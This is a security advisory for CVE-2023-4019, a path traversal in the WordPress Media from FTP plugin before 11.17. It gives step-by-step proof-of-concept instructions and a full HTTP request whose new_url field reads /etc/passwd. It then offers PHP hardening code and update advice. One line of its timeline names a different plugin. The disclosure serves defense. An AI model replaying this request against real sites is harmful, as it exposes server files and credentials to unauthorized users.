
CVE-2023-4019 – Media from FTP < 11.17 - Author + Arbitrary File Access via Path Traversal

While testing WordPress plugins, we found a high-severity vulnerability in the Media from FTP plugin, in versions before 11.17. The flaw is a Path Traversal: the plugin does not properly limit who may use it, so a user with Author or higher privileges can register and move files outside the intended directory, including wp-config.php, which may lead to remote code execution (RCE) in some cases.

Main info:

CVE: CVE-2023-4019
Plugin: Media from FTP
Critical: High
Publicly Published: August 14, 2023
Last Updated: August 14, 2023
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A5: Broken Access Control
PoC: Yes
Exploit: Will be later
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4019
https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d
Plugin Security Certification by CleanTalk

Timeline

July 26, 2023: Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
July 26, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
July 31, 2023: The author has released a fix update
August 14, 2023: Registered CVE-2023-4019

Discovery of the Vulnerability

During testing of the plugin, a vulnerability was discovered in the mediafromftp-update-ajax-action AJAX action: the path it accepts is not restricted to /var/www/html, so local files from anywhere on the server can be registered into the media library and then viewed, for example /etc/passwd, /etc/hosts and other local files and documents. This is possible on behalf of a user with Author rights. By default, an Author is not authorized to view local files and cannot interact with them directly, so exposing them is very critical for the application owner. To eliminate this vulnerability, I ask you to validate the path the user enters and respond with Forbidden if it does not lie within the root directory.

Understanding Path Traversal attacks

Path Traversal, a well-known attack technique, is at the core of this vulnerability. It involves manipulating file paths (for example with ../ sequences or absolute paths) to break out of the intended directory and reach files beyond the permitted scope. Attackers use it to read files and directories that are otherwise restricted. Reference: Path Traversal (OWASP TOP-10).

Exploiting the Path Traversal vulnerability

Exploiting CVE-2023-4019 allows an attacker to step outside the restricted directory /var/www/html and pull local files into the media library, including files from sensitive system directories.

POC:

1) Go to /wordpress/wp-admin/admin.php?page=mediafromftp-search-register

2) Select any file from the media text list below

3) Click “Update Media”

4) Intercept request with action=mediafromftp-update-ajax-action

5) Change new_url to a local path like /etc/passwd or /etc/hosts

POC request:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_host
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=mediafromftp-search-register
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: http://your_host
DNT: 1
Connection: close
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7Cb8692eb78cc5aa5fb9911291a78d34a0e04461ed834d1ca96b121cf1ef714aff; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7C1fe25db056c3038ca9accd05f2608008d9db007ec3d7b37572208454e3f62357; wp-settings-time-2=1690433465
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36
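The fix asked for in the discovery section, applied to the new_url parameter of the request above: canonicalize the submitted path and refuse it unless it lies inside the uploads directory, and gate the action behind an administrator capability rather than Author. This is an added example written for this article, not Media from FTP's own code; the function names, the manage_options capability, the nonce action name and the uploads directory as the allowed base are my assumptions. The demo at the bottom builds a throwaway uploads tree in a temp directory so the file runs from the CLI with plain PHP.

```php
<?php
// Added example (not the plugin's code). Names and the chosen base directory
// are assumptions; the technique is canonical-path containment plus a
// capability check, as recommended in the advisory.

/**
 * Resolve $candidate and return its canonical path only if it lies inside $base.
 * realpath() collapses "..", symlinks and duplicate slashes, so a prefix
 * comparison on the canonical forms is reliable. Returns null on rejection.
 */
function resolve_inside_base(string $candidate, string $base): ?string
{
    $realBase = realpath($base);
    $realPath = realpath($candidate);
    if ($realBase === false || $realPath === false) {
        return null;                       // base missing, or file does not exist
    }
    // Trailing separator so ".../uploads-evil/x" is not treated as inside ".../uploads".
    $realBase = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($realPath, $realBase, strlen($realBase)) !== 0) {
        return null;                       // escaped the allowed directory
    }
    return $realPath;
}

/**
 * Hardened shape of the AJAX update handler. Only meaningful inside WordPress,
 * so it is guarded to keep this file runnable from the CLI.
 * 'mediafromftp-update-ajax-action' as the nonce action name is an assumption.
 */
function hardened_update_handler(): void
{
    if (!function_exists('current_user_can')) {
        return;                            // not running under WordPress
    }
    check_ajax_referer('mediafromftp-update-ajax-action', 'nonce');
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);          // Authors are not enough
    }
    $uploads = wp_upload_dir();
    $path = resolve_inside_base(wp_unslash($_POST['new_url'] ?? ''), $uploads['basedir']);
    if ($path === null) {
        error_log('mediafromftp: rejected new_url outside uploads for user ' . get_current_user_id());
        wp_send_json_error('path outside uploads', 400);
    }
    // From here on, use only $path (the canonical, validated location).
}

// --- Self-contained demo with a constructed uploads tree (not real site data) ---
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'mff-demo-' . getmypid();
mkdir("$tmp/uploads/2023", 0700, true);
touch("$tmp/uploads/2023/photo.jpg");
touch("$tmp/wp-config.php");
@symlink('/etc/passwd', "$tmp/uploads/link");     // symlink inside the base pointing out

$cases = [
    "$tmp/uploads/2023/photo.jpg",     // legitimate media file
    "$tmp/uploads/../wp-config.php",   // traversal with ".."
    '/etc/passwd',                     // absolute path, as in the PoC request
    "$tmp/uploads/link",               // symlink escape: realpath follows it
];
foreach ($cases as $candidate) {
    $result = resolve_inside_base($candidate, "$tmp/uploads");
    printf("%-50s => %s\n", str_replace($tmp, '<tmp>', $candidate),
           $result === null ? 'REJECTED' : 'ok');
}
// Expected: only the photo.jpg line prints "ok"; the other three are REJECTED.

// cleanup of the constructed tree
@unlink("$tmp/uploads/link");
unlink("$tmp/uploads/2023/photo.jpg");
unlink("$tmp/wp-config.php");
rmdir("$tmp/uploads/2023");
rmdir("$tmp/uploads");
rmdir($tmp);
```

Two points in the design matter for this bug class. The comparison is done on realpath() output, never on the raw string, because a naive check for ".." misses absolute paths (the PoC simply sends /etc/passwd) and symlinks; and the base gets a trailing separator so a sibling directory with the same prefix cannot pass. The capability check is separate from the path check: even a path inside uploads should not be reachable by every Author if the plugin's purpose is administrative.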

Potential Risks and Real-World Impact

The Path Traversal vulnerability within the Media from FTP plugin introduces grave risks and potential scenarios:

  1. Data Exposure:
    Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
  2. Malicious Use of Stolen Data:
    Extracted data from unauthorized file access could be used maliciously, undermining the integrity of the entire system.
  3. System Disruption:
    Access to sensitive files could lead to unintended modifications, potentially disrupting the functioning of the WordPress installation.

Recommendations for Improved Security

Safeguard your WordPress environment against CVE-2023-4019: update Media from FTP to version 11.17 or later, the release that contains the author's fix.

Empower the WordPress community with the knowledge of CVE-2023-4019. Share this article far and wide to ensure website owners take proactive measures against this critical vulnerability.

#WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.
